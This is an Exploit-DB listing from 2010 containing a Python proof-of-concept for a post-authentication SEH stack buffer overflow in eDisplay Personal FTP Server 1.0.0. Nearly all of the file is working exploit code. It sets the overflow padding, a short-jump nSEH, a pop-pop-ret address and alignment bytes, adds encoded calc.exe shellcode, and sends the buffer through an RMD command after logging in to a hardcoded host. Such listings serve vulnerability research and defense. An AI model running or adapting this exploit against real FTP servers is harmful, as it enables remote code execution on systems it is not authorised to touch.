eDisplay Personal FTP Server 1.0.0 - (Authenticated) Multiple Stack Buffer Overflows (2)

EDB-ID:

11877

CVE:

N/A


Author:

sud0

Type:

remote


Platform:

Windows

Date:

2010-03-25


# Exploit Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF
# Type of sploit: Remote Code Execution
# Bug found by  : loneferret  (march 19, 2010)
# Reference     : http://www.exploit-db.com/exploits/11810
# Exploit date  : March 24, 2010
# Author        : Sud0
# Version       : 1.0.0
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : corelanc0d3r and of course my friends and .... first of all my wife for supporting me and my obsession :)
# Change IP and ftp account according to your server

import socket
 
junk="B" * 37 #seh overwritten after 37 bytes
nseh= "\x74\x20\x74\x20" # jmp forward (used a JE to avoid Bad Chars)
seh= "\x69\x40\x2b\x20" # ppr from 

#shellcode for calc.exe encoded with Alpha2 basereg = eax
shellcode="PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJILKJLV5LKJL3XQ0WPQ0FOCXU33Q2LSSLMPEZXV0NX9WMCIRSGKO8PA" 

#shellcode to align eax for decoder
align="\x5A\x5A\x5A\x52\x58\x2D\x3B\x55\x55\x55\x2D\x3B\x55\x55\x55\x2D\x3B\x55\x55\x55"

buffer= junk+nseh+seh + "C"* 26  + align + "C" * 25 + shellcode + "A" * 50

print "Sending Exploit .... \r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.101',21))
s.recv(1024)
s.send('USER fox\r\n')
s.recv(1024)
s.send('PASS mulder\r\n')
s.recv(1024)
s.send('RMD ' + buffer + '\r\n')
s.close